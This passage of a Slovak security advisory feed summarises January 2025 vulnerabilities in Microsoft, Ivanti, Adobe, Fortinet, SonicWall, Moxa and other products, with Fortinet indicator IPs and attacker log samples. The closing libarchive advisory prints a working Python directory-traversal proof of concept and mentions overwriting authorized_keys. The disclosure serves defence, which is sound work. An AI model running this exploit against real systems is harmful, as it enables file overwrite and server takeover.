Microsoft Purview obsahuje zraniteľnosť, ktorú by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov a následné získanie neoprávneného prístupu k citlivým údajom. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.

CVE-2025-21354, CVE-2025-21362 (CVSS skóre 8,4)

Kritické zraniteľnosti v Microsoft Excel spočívajú v dereferencii nedôveryhodného ukazovateľa (CVE-2025-21354) a použití odalokovaného miesta v pamäti (CVE-2025-21362). Lokálny neautentifikovaný útočník by ich mohol zneužiť na vykonanie kódu.

CVE-2025-21297, CVE-2025-21309 (CVSS skóre 8,1)

Komponent Windows Remote Desktop Services obsahuje dve kritické zraniteľnosti, ktoré možno zneužiť na vzdialené vykonanie kódu. Prvá zraniteľnosť s označením CVE-2025-21297 spočíva v použití odalokovaného miesta v pamäti. CVE-2025-21309 spočíva v ukladaní citlivých dát v nesprávne uzamknutej pamäti. Zraniteľnosti možno zneužiť pripojením sa na zraniteľné systémy v konfigurácii Remote Desktop Gateway. Úspešné zneužitie zraniteľností vyžaduje, aby útočník vyhral súbeh procesov.

CVE-2025-21294 (CVSS skóre 8,1)

Komponent Microsoft Digest Authentication obsahuje zraniteľnosť, ktorá spočíva v ukladaní citlivých údajov v nesprávne uzamknutej pamäti a umožňuje vzdialené vykonanie kódu. Zraniteľnosť možno zneužiť pripojením sa na systémy využívajúce autentifikáciu prostredníctvom Digest Authentication, pričom pre úspešné zneužitie zraniteľnosti je potrebné, aby útočník vyhral súbeh procesov.

CVE-2025-21295 (CVSS skóre 8,1)

Zraniteľnosť s identifikátorom CVE-2025-21295 sa nachádza v bezpečnostnom mechanizme SPNEGO Extended Negotiation (NEGOEX) a vzdialený neautentifikovaný útočník vy ju mohol zneužiť na vzdialené vykonanie kódu.

CVE-2025-21296 (CVSS skóre 7,5)

Zraniteľnosť v komponente BranchCache by neautentifikovaný útočník nachádzajúci sa v rovnakom sieťovom segmente mohol zneužiť na vykonanie kódu. CVE-2025-21296 spočíva v použití odalokovaného miesta v pamäti. Úspešné zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.

Aktívne zneužívané zraniteľnosti:

CVE-2025-21333, CVE-2025-21334 a CVE-2025-21335 (CVSS skóre 7,8)

Zraniteľnosti nachádzajúce sa v ovládači NT Kernel Integration VSP, ktorý je súčasťou hypervízora Windows Hyper-V spočívajú v použití odalokovaného miesta v pamäti (CVE-2025-21334, CVE-2025-21335) a pretečení medzipamäte haldy (CVE-2025-21333). Lokálny autentifikovaný útočník by ich mohol zneužiť na eskaláciu privilégií na úroveň oprávnení SYSTEM. Zraniteľnosti sú v súčasnosti aktívne zneužívané útočníkmi.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby (DoS)
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Bezodkladné nasadenie januárového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

Kritické zraniteľnosti v produktoch Ivanti Endpoint Manager, Avalanche, Application Control Engine

Marian Danko — Fri, 17 Jan 2025 13:34:52 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Endpoint Manager (EPM), Avalanche, Application Control Engine, ktoré opravujú 20 zraniteľností, z ktorých 4 sú označené ako kritické. Kritické zraniteľnosti s označením CVE-2024-10811, CVE-2024-13161, CVE-2024-13160 a CVE-2024-13159 sa nachádzajú v produkte EPM a vzdialený neautentifikovaný útočník by ich mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

Ivanti Endpoint Manager 2022 SU6 bez bezpečnostných záplat z januára 2025
Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z januára 2025
Ivanti Avalanche vo verziách starších ako 6.4.7
Ivanti Application Control Engine 2024.3 bez bezpečnostných záplat HF1
Ivanti Application Control Engine 2024.1 bez bezpečnostných záplat HF2
Ivanti Application Control Engine 2023.3 bez bezpečnostných záplat HF3
Ivanti Security Controls vo verziách starších ako 2024.4.1 (ukončená podpora)

Opis zraniteľnosti:

Ivanti Endpoint Manager:

CVE-2024-10811, CVE-2024-13159, CVE-2024-13160, CVE-2024-13161 (CVSS skóre 9,8)

Bližšie nešpecifikované kritické zraniteľnosti v produkte Ivanti Endpoint Manager (EPM) by vzdialený neautentifikovaný útočník mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom. Uvedené údaje možno následne zneužiť na získanie úplnej kontroly nad systémom.

Ivanti Avalanche:

CVE-2024-13179, CVE-2024-13181 (CVSS skóre 7,3)

Vysoko závažné zraniteľnosti s označením CVE-2024-13179 a CVE-2024-13181 by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu do systému.

CVE-2024-13180 (CVSS skóre 7,5)

Zraniteľnosť možno zneužiť na získanie neoprávneného prístupu k citlivým údajom.

Ivanti Application Control:

CVE-2024-10630 (CVSS skóre 7,8)

Vysoko závažná zraniteľnosť v produkte Ivanti Application Control Engine spočíva v súbehu procesov a lokálny autentifikovaný útočník by ju mohol zneužiť na obídenie bezpečnostných mechanizmov aplikácie a úplné narušenie dôvernosti, integrity a dostupnosti systému.

Možné škody:

Získanie neoprávneného prístupu do systému
Získanie neoprávneného prístupu k citlivým údajom
Vzdialené vykonanie kódu
Eskalácia privilégií
Zneprístupnenie služby (DoS)
Obídenie bezpečnostného prvku

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a vykonať bezodkladnú aktualizáciu zasiahnutých systémov na najnovšie verzie:

Ivanti Endpoint Manager 2022 SU6 January-2025 Security Update
Ivanti Endpoint Manager 2024 January-2025 Security Update
Ivanti Avalanche v 6.4.7
Ivanti Application Control Engine 2024.3 HF1
Ivanti Application Control Engine 2024.1 HF2
Ivanti Application Control Engine 2023.3 HF3

Vzhľadom na to, že 31. decembra 2024 skončila technická podpora produktu Ivanti Security Controls, výrobca odporúča migráciu na produkt Ivanti Application Control.

Zdroje:

Kritické bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Fri, 17 Jan 2025 13:03:17 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Adobe Photoshop, Adobe Substance3D Stager, Adobe Illustrator for iPad, Adobe Animate, Adobe Substance3D Designer, ktoré opravujú 14 kritických zraniteľností. Uvedené zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu.

Zraniteľné systémy:

Adobe Photoshop 2025 v 26.1 a staršie
Adobe Photoshop 2024 v 25.12 a staršie
Adobe Substance 3D Stager v 3.0.4 a staršie
Adobe Illustrator on iPad v 3.0.7 a staršie
Adobe Animate  2023 v 23.0.9 a staršie
Adobe Animate  2024 v 24.0.6 a staršie
Adobe Substance 3D Designer v 14.0 a staršie

Opis zraniteľnosti:

Adobe Photoshop:

CVE-2025-21127 (CVSS skóre 7,3), CVE-2025-21122 (CVSS skóre 7,8)

Kritické zraniteľnosti v produkte Adobe Photoshop spočívajú v podtečení celočíselnej premennej (CVE-2025-21122) a absencii overovania vyhľadávacích ciest (CVE-2025-21127) a podvrhnutím špeciálne vytvorených súborov ich možno zneužiť na vykonanie škodlivého kódu.

Adobe Substance 3D Stager:

CVE-2025-21128, CVE-2025-21129, CVE-2025-21130, CVE-2025-21131, CVE-2025-21132 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v možnosti zápisu do pamäte mimo povolených hodnôt (CVE-2025-21130, CVE-2025-21131, CVE-2025-21132), pretečení medzipamäte haldy (CVE-2025-21129) a pretečení vyrovnávacej pamäte zásobníka (CVE-2025-21128) umožňujú vykonanie škodlivého kódu.

Adobe Illustrator on iPad:

CVE-2025-21133, CVE-2025-21134 (CVSS skóre 7,8)

Obe zraniteľnosti spočívajú v podtečení celočíselnej premennej v rámci produktu Adobe Illustrator on iPad možno zneužiť na vykonanie škodlivého kódu.

Adobe Animate:

CVE-2025-21135 (CVSS skóre 7,8)

Podtečenie celočíselnej premennej možno zneužiť na vykonanie škodlivého kódu.

Adobe Substance 3D Designer:

CVE-2025-21136, CVE-2025-21137, CVE-2025-21138, CVE-2025-21139 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v povolení zápisu do pamäte mimo povolených hodnôt (CVE-2025-21136, CVE-2025-21138) a pretečení medzipamäte haldy (CVE-2025-21137, CVE-2025-21139) umožňujú vykonanie škodlivého kódu.

Zneužitie vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorené súbory.

Možné škody:

Vykonanie škodlivého kódu

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verzie:

Adobe Photoshop 2025 v 26.2
Adobe Photoshop 2024 v 25.12.1
Adobe Substance 3D Stager v 3.1.0
Adobe Illustrator on iPad v 3.0.8
Adobe Animate  2023 v 23.0.10
Adobe Animate  2024 v 24.0.7
Adobe Substance 3D Designer v 14.1

Zároveň odporúčame poučiť používateľov, aby neotvárali správy a prílohy z neznámych a nedôveryhodných zdrojov.

Zdroje:

Bezpečnostné zraniteľnosti v migračnom nástroji Palo Alto Networks Expedition

Marian Danko — Fri, 17 Jan 2025 12:46:14 +0000

Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú 5 zraniteľností v migračnom nástroji Expedition. Najzávažnejšiu zraniteľnosť CVE-2025-0103 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom a vytvorenie alebo odstránenie súborov na systémoch spravovaných prostredníctvom Expedition.

Zraniteľné systémy:

Palo Alto Expedition vo verziách starších ako 1.2.101

Pozn.: Spoločnosť Palo Alto k 31. decembru 2024 ukončila poskytovanie technickej podpory pre produkt Expedition. Bližšie informácie môžete nájsť na stránke výrobcu.

Opis zraniteľnosti:

CVE-2025-0103 (CVSS 4.0 skóre 7,8)

Vysoko závažnú zraniteľnosť CVE-2025-0103 by vzdialený autentifikovaný útočník prostredníctvom SQL injekcie mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom v databáze a vytvorenie nových alebo čítanie obsahu existujúcich súborov na systémoch Expedition.

CVE-2025-0104 (CVSS 4.0 skóre 4,7)

Zraniteľnosť by vzdialený neautentifikovaný útočník prostredníctvom reflektovaných XSS (Cross Site Scripting) útokov mohol zneužiť na vykonanie JavaScript kódu vo webovom prehliadači obeti a krádež relácie obete. Zneužitie zraniteľnosti vyžaduje interakciu používateľa so škodlivým odkazom.

CVE-2025-0107 (CVSS 4.0 skóre 4,4)

Bližšie nešpecifikovanú zraniteľnosť možno zneužiť na injekciu systémových príkazov s oprávneniami používateľa www-data a získanie neoprávneného prístupu k citlivým údajom.

CVE-2025-0105, CVE-2025-0106 (CVSS 4.0 skóre 2,7)

Zraniteľnosti možno zneužiť na enumeráciu súborov na súborovom systéme a zmazanie súborov prístupných používateľovi www-data.

Databáza a súbory v rámci Expedition môžu obsahovať prihlasovacie údaje, konfiguračné nastavenia a API kľúče pre firewally s operačným systémom PAN-OS, ktoré možno v rámci ďalších útokov zneužiť na prienik do systémov.

Možné škody:

Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Vzdialené vykonanie kódu

Odporúčania:

Spoločnosť Palo Alto odporúča bezodkladnú aktualizáciu nástroja Expedition na verziu 1.2.101. Vzhľadom na to, že k 31. decembru 2024 bola ukončená technická podpora tohto produktu, výrobca odporúča prejsť na alternatívne produkty s platnou technickou podporou.

Zdroje:

Aktívne zneužívaná kritická zraniteľnosť vo firewalloch FortiGate od spoločnosti Fortinet

Marian Danko — Fri, 17 Jan 2025 12:27:28 +0000

Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zero-day zraniteľnosť v operačnom systéme FortiOS a produkte FortiProxy. CVE-2024-55591 možno zaslaním špeciálne vytvorenej požiadavky zneužiť na získanie administrátorského prístupu k zariadeniu a získanie úplnej kontroly nad systémom.

[Aktualizácia: 13.2.2025]

Zraniteľné systémy:

FortiOS 7.0.X vo verziách starších ako 7.0.17
FortiProxy 7.2.X vo verziách starších ako 7.2.13
FortiProxy 7.0.X vo verziách starších ako 7.0.20

Pozn.: Zraniteľné sú všetky neaktualizované zariadenia s manažmentovým rozhraním dostupným z internetu.

Opis zraniteľnosti:

CVE-2024-55591 (CVSS skóre 9,6)

Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorenej požiadavky na websocket modul Node.js mohol zneužiť na získanie administrátorského prístupu (privilégiá super-admin) k zariadeniu.

Zraniteľnosť je aktívne zneužívaná minimálne od polovice novembra 2024. Útočníci po získaní kontroly nad zariadením vytvárajú nové používateľské účty (vrátane administrátorských), pridávajú ich do existujúcich alebo novovytvorených SSL VPN skupín, modifikujú firewallové pravidlá a vykonané úpravy zneužívajú na prienik do chránených VPN sietí.

Možné škody:

Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Výrobca odporúča vykonať bezodkladnú aktualizáciu FortiOS 7.0.X na verziu 7.0.17, FortiProxy 7.2.X na verziu 7.2.13 a FortiProxy 7.0.X na verziu 7.0.20 a limitovať prístup k manažmentovému rozhraniu firewallov. Prístup možno limitovať úplnou deaktiváciou manažmentového rozhrania alebo konfiguráciou zoznamu dôveryhodných IP adries v rámci zariadení. Kompletný návod môžete nájsť na stránke výrobcu v časti Workaround. Spoločnosť Fortinet taktiež odporúča vykonať hardening zariadení s FortiOS.

Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie v logoch FortiGate zariadení a logoch ďalších sieťových a bezpečnostných prvkov.

[Aktualizácia: 13.2.2025]

CVE-2025-24472 (CVSS skóre 8,1)

Spolu s vyššie uvedenom zraniteľnosťou spoločnosť Fortinet opravila vysoko závažnú zraniteľnosť CVE-2025-24472. Zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených CFS proxy požiadaviek mohol zneužiť na získanie úplnej kontroly nad systémom.

Indikátory kompromitácie (IoC):

IP adresy:

45.55.158[.]47
87.249.138[.]47
155.133.4[.]175
37.19.196[.]65
149.22.94[.]37

Aktivity útočníka generujú záznamy v logoch zariadení:

prihlásenie používateľa super_admin s náhodnými scrip a dstip (napr. 1.1.1.1, 127.0.0.1, 2.2.2.2, 8.8.8.8, 8.8.4.4), príklad logového záznamu:

type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" sn="1733486785" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"

vytvorenie administrátorského účtu s náhodne generovaným meno používateľa (napr. Gujhmk, Ed8x4k, G0xgey) a zdrojovou IP, príklad logového záznamu:

type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgtid=1411317760 cfgpath="system.admin" cfgobj="vOcep" cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin vOcep"

Zdroje:

Mesačný prehľad kritických zraniteľností december 2024

Marian Danko — Wed, 15 Jan 2025 14:58:04 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2024.

Mesačný prehľad – 12/2024 PDF (630 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Aktívne zneužívaná kritická zraniteľnosť v produkte GFI KerioControl

Marian Danko — Mon, 13 Jan 2025 15:04:52 +0000

Spoločnosť GFI vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť v produkte KerioControl. CVE-2024-52875 možno zneužiť na vzdialené vykonanie kódu a následné získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

GFI Software KerioControl vo verziách 9.2.5 až 9.4.5

Opis zraniteľnosti:

CVE-2024-52875 (CVSS skóre 9,6)

Zraniteľnosť vo webovom rozhraní KerioControl spočíva v nedostatočnom overovaní používateľských vstupov v rámci parametra dest požiadavky GET vo viacerých URI (Uniform Resource Identifier). Chyba bola identifikovaná v nasledovných URI, no môže sa nachádzať aj v iných:

/nonauth/addCertException.cs
/nonauth/guestConfirm.cs
/nonauth/expiration.cs

Nesprávna sanitizácia znakov LF (line feed (\n)) vzdialenému útočníkovi umožňuje realizovať tzv. HTTP Response Splitting útoky, ktoré možno zneužiť na presmerovanie obete alebo realizáciu reflektovaných XSS (Cross Site Scripting) útokov.

Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí kliknúť na špeciálne vytvorenú URL adresu.

V prípade, že obeťou sa stane používateľ s administrátorskými oprávneniami, možno internú funkcionalitu pre aktualizáciu firmvéru firewallu zneužiť na nahratie škodlivých IMG súborov a získanie úplnej kontroly nad zariadením.

Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci postup jej zneužitia. Zraniteľnosť je podľa spoločnosti GreyNoise aktívne zneužívaná útočníkmi minimálne od 28. decembra 2024.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Výrobca odporúča bezodkladnú aktualizáciu zasiahnutých systémov na verziu 9.4.5p1. Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame v logoch sieťových a bezpečnostných prvkov preveriť HTTP požiadavky na prítomnosť znakov „\r” a “\n”, minimálne smerované na zraniteľné URI:

/nonauth/addCertException.cs
/nonauth/guestConfirm.cs
/nonauth/expiration.cs

Zdroje:

Kritické zraniteľnosti vo WordPress plugine Fancy Product Designer

Marian Danko — Mon, 13 Jan 2025 15:01:12 +0000

Bezpečnostní výskumníci zverejnili informácie o dvoch kritických zraniteľnostiach vo WordPress plugine Fancy Product Designer. Zraniteľnosti možno zneužiť na upload škodlivých súborov, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress plugin Fancy Product Designer 6.4.3 a staršie

Opis zraniteľnosti:

CVE-2024-51818 (CVSS skóre 9,3)

Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov a možno ju prostredníctvom SQL injekcie zneužiť na získanie neoprávneného prístupu k citlivým údajom a vykonanie neoprávnených zmien v databáze.

CVE-2024-51919 (CVSS skóre 9,0)

Kritická zraniteľnosť vo funkcionalite pre nahrávanie súborov spočíva v nedostatočnom overovaní a limitácii typov nahrávaných súborov pri volaní funkcií save_remote_file a fpd_admin_copy_file. Možno ju zneužiť na nahratie škodlivých súborov z externých URL zdrojov a vzdialené vykonanie kódu.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v databáze

Odporúčania:

Bezodkladná aktualizácia Fancy Product Designer na verziu 6.4.4.

Taktiež odporúčame preveriť logy na prítomnosť pokusov o zneužitie zraniteľnosti a integritu databázy a samotného redakčného systému WordPress.

Zdroje:

Vysoko závažné zraniteľnosti vo firewalloch SonicWall s operačným systémom SonicOS

Marian Danko — Thu, 09 Jan 2025 16:07:38 +0000

Spoločnosť SonicWall vydala bezpečnostné aktualizácie pre svoje firewally s operačným systémom SonicOS, ktoré opravujú 4 vysoko závažné zraniteľnosti. Najzávažnejšiu zraniteľnosť s označením CVE-2024-53704 možno zneužiť na obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu do systému. Ostatné zraniteľnosti možno zneužiť na obídenie mechanizmov autentifikácie, realizáciu SSRF útokov a eskaláciu privilégií.

[Aktualizácia: 13.2.2025]

Zraniteľné systémy:

Hardware firewally Gen6 (SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650, NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250, SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W) so SonicOS verziách 6.5.4.15-117n a starších
Network Security Virtual firewally Gen7 (NSv 270, NSv 470, NSv 870, vrátane cloudových verzií pre AWS a Azure) so SonicOS verziách 7.0.1-5161 a starších, 7.1.1-7058 a starších a verzii 7.1.2-7019
Firewally Gen7 (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700,NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700) so SonicOS verziách 7.0.1-5161 a starších, 7.1.1-7058 a starších a verzii 7.1.2-7019
NGFW Firewally TZ80 so SonicOS verzie 8.0.0-8035

Opis zraniteľnosti:

CVE-2024-53704 (CVSS skóre 8,2)

Nedostatočnú implementáciu mechanizmov autentifikácie v rámci komponentu SSLVPN by vzdialený neautentifikovaný útočník mohol zneužiť zaslaním špeciálne vytvoreného session cookie na prebratie aktívnych SSL VPN relácií a získanie neoprávneného prístupu do siete.
[Aktualizácia 13.2.2025]: Bezpečnostní výskumníci zo spoločnosti BISHOP FOX zverejnili pre zraniteľnosť exploit. Je teda možné očakávať pokusy o cielené zneužívanie zraniteľnosti.

CVE-2024-53706 (CVSS skóre 7,8)

Zraniteľnosť vo funkcii SSH Config by vzdialený autentifikovaný útočník mohol zneužiť na eskaláciu privilégií na úroveň používateľa root a následné vykonanie škodlivého kódu.

CVE-2024-40762 (CVSS skóre 7,1)

Generátor autentifikačných tokenov v SSLVPN využíva kryptograficky slabý generátor pseudonáhodných čísel, čo by vzdialený neautentifikovaný útočník mohol zneužiť na predikciu tokenov a získanie neoprávneného prístupu do systému.

CVE-2024-53705 (CVSS skóre 6,5)

Bližšie nešpecifikovanú zraniteľnosť v manažmentom rozhraní SSH možno zneužiť na realizáciu útokov SSRF (Server Side Request Forgery) a vytvoriť TCP pripojenie na ľubovoľný port.

Možné škody:

Neoprávnený prístup do systému
Eskalácia privilégií
Vzdialené vykonanie kódu

Odporúčania:

Spoločnosť SonicWall odporúča vykonať bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verzie:

Gen 6 / 6.5 hardware firewalls: SonicOS 6.5.5.1-6n
Gen 6 / 6.5 NSv firewalls: SonicOS 6.5.4.v-21s-RC2457
Gen 7 a Gen 7 NSv firewalls: SonicOS 7.0.1-5165; 7.1.3-7015
TZ80: SonicOS 8.0.0-8037

Výrobca taktiež odporúča limitovať prístup k manažmentovým rozhraniam firewallov.

Zdroje:

Aktívne zneužívaná kritická zraniteľnosť v produktoch Ivanti ICS, IPS a Neurons for ZTA gateways

Marian Danko — Thu, 09 Jan 2025 16:05:58 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 2 bezpečnostné zraniteľnosti v produktoch Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a Ivanti Neurons for ZTA gateways, z čoho 1 je označená ako kritická. CVE-2025-0282 možno zneužiť na vzdialené vykonanie kódu. Druhú zraniteľnosť možno zneužiť na eskaláciu privilégií.

[Aktualizácia: 17.2.2025]

Zraniteľné systémy:

Ivanti Connect Secure vo verziách 22.7R2 až 22.7R2.4
Ivanti Policy Secure vo verziách 22.7R1 až 22.7R1.2
Ivanti Neurons for ZTA gateways vo verziách 22.7R2 až 22.7R2.3

Opis zraniteľnosti:

CVE-2025-0282 (CVSS skóre 9,0)

Kritická zraniteľnosť spočíva v pretečení zásobníka a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu.

CVE-2025-0282 je v súčasnosti aktívne zneužívaná na kompromitáciu Ivanti Connect Secure a následnú inštaláciu malvéru. Zneužitie zraniteľnosti možno na zariadeniach overiť prostredníctvom nástroja ICT (Integrity Checker Tool).

[Aktualizácia 17.2.2025]
JPCERT/CC zverejnil informácie, že zraniteľnosť CVE-2025-0282 je v súčasnosti aktívne zneužívaná na šírenie malwarového frameworku SPAWNCHIMERA. Tento framework kombinuje funkcionality malvéru SPAWNANT, SPAWNMOLE a SPAWNNAIL a obsahuje aj funkciu brániacu ďalšiemu zneužitiu zraniteľnosti, čím bráni opätovnej infekcii zo strany iných aktérov.

CVE-2025-0283 (CVSS skóre 7,0)

Vysoko závažná zraniteľnosť spočívajúcu v pretečení zásobníka by lokálny autentifikovaný útočník mohol zneužiť na eskaláciu privilégií.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a vykonať bezodkladnú aktualizáciu zasiahnutých systémov.

Aktualizácie pre produkt Ivanti Connect Secure (verzia 22.7R2.5) sú už dostupné na stiahnutie. Pred vykonaním aktualizácie výrobca odporúča preskúmať integritu zariadenia prostredníctvom ICT (Integrity Checker Tool) a vykonať preventívnu obnovu továrenských nastavení.

Aktualizácie pre produkty Ivanti Policy Secure a Ivanti Neurons for ZTA sú naplánované na 21.01.2025.

Zdroje:

Zraniteľnosti routerov a sieťových zariadení Moxa

Marian Danko — Wed, 08 Jan 2025 14:16:20 +0000

Spoločnosť Moxa vydala bezpečnostné aktualizácie svojich priemyselných routerov a sieťového príslušenstva, ktoré opravujú dve zraniteľnosti, z ktorých jedna je označená ako kritická. CVE-2024-9140 by vzdialený útočník mohol zneužiť na injekciu príkazov a vzdialené vykonanie škodlivého kódu a CVE-2024-9138 by útočník mohol zneužiť na eskaláciu privilégií na úroveň používateľa root.

Zraniteľné systémy:

EDR-810 Series, firmware 5.12.37 a staršie
EDR-8010 Series, firmware 3.13.1 a staršie
EDR-G902 Series, firmware 5.7.25 a staršie
EDR-G903 Series, firmware 5.7.25 a staršie
EDR-G9004 Series, firmware 3.13.1 a staršie
EDR-G9010 Series, firmware 3.13.1 a staršie
EDF-G1002-BP Series, firmware 3.13.1 a staršie
NAT-102 Series, firmware 1.0.5 a staršie
OnCell G4302-LTE4 Series, firmware 3.13 a staršie
TN-4900 Series, firmware 3.13 a staršie

Opis činnosti:

CVE-2024-9138 (CVSS 4.0 skóre 8,6)

Zraniteľnosť spočíva v existencii zabudovaných prihlasovacích údajov, ktoré by autentifikovaný útočník mohol zneužiť na eskaláciu privilégií na úroveň používateľa root.

CVE-2024-9140 (CVSS 4.0 skóre 9,3)

Zraniteľnosť spočíva v nedostatočnej kontrole používateľských vstupov a vzdialený neautorizovaný útočník by ju mohol zneužiť na injekciu systémových príkazov a vzdialené vykonanie škodlivého kódu.

Možné škody:

Vzdialené vykonávanie kódu
Eskalácia oprávnení

Odporúčania:

Bezodkladná aktualizácia aspoň na verziu:

EDR-810 Series, firmware 3.14
EDR-8010 Series, firmware 3.14
EDR-G902 Series, firmware 3.14
EDR-G903 Series, firmware 3.14
EDR-G9004 Series, firmware 3.14
EDR-G9010 Series, firmware 3.14
EDF-G1002-BP Series, firmware 3.14
NAT-102 Series – aktuálne nie je záplata dostupná
OnCell G4302-LTE4 Series – záplatu poskytne technická podpora Moxa
TN-4900 Series, firmware 3.14

Mitigovať zraniteľnosti spoločnosť Moxa odporúča limitovaním sieťového prístupu k predmetným zariadeniam, povolením prístupu cez SSH len pre dôveryhodné IP adresy a nasadením prvkov IDS a IPS.

Odkazy:

Zraniteľnosť knižnice Python libarchive umožňuje Directory Traversal

Marian Danko — Tue, 07 Jan 2025 12:33:33 +0000

Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť v Python knižnici libarchive, ktorá umožňuje vykonávať útoky typu directory traversal.

Zraniteľné systémy:

libarchive – 4.2.1

Vyššie uvedená verzia bola otestovaná. Nemôžeme vylúčiť, že zraniteľné sú aj staršie verzie.

Opis činnosti:

CVE-2024-55587

Zraniteľnosť sa nachádza v najnovšej verzii knižnice libarchive (4.2.1) a súvisí s absenciou ošetrovania názvov súborov nachádzajúcich sa v poskytnutom súbore ZIP. Táto zraniteľnosť sa nachádza v triede ZipFile v metódach extract a extractall. V prípade, že názvy súborov v nahranom súbore ZIP obsahujú relatívnu cestu (../) alebo aj absolútnu cestu (/tmp/test.txt) je možné danú zraniteľnosť zneužiť nasledovným spôsobom.

Keď napríklad vytvoríme súbor ZIP pomocou nasledovného Python kódu:

import pyzipper import time with pyzipper.ZipFile("exploit.zip", 'w', compression=pyzipper.ZIP_LZMA) as zf: current_time = time.localtime(time.time())[:6] zip_info = zf.zipinfo_cls(filename="/tmp/vulnerable.txt", date_time=current_time) zf.writestr(zip_info, "vulnerable")

Vytvorí sa nám súbor ZIP s názvom exploit.zip obsahujúci jediný súbor s názvom /tmp/vulnerable.txt.

Keď následne tento súbor extrahujeme za pomoci zraniteľnej metódy extractall:

from libarchive.zip import ZipFile with ZipFile("exploit.zip", mode="r") as archive: archive.extractall(path="./")

V adresári /tmp sa nám vytvorí súbor s názvom vulnerable.txt, ktorý bude obsahovať text „vulnerable“.

Táto zraniteľnosť sa nachádza v súbore libarchive/zip.py na riadku 107:

return self.readpath(name, os.path.join(path, name))

kde premenná name nie je ošetrovaná. Vzhľadom na správanie metódy join v module path knižnice os teda novou cestou bude posledná zadaná absolútna cesta, t.j. nami zadaný názov súboru /tmp/vulnerable.txt.
Zneužitím danej zraniteľnosti môže dôjsť napríklad ku získaniu prístupu na server prepísaním súboru authorized_keys, nachádzajúceho sa v podpriečinku .ssh domovského priečinku používateľa.

Zraniteľnosť bola overovaná s použitím nasledujúcich verzií knižníc:

libarchive – 4.2.1

Možné škody:

Prepísanie citlivých súborov

Odporúčania:

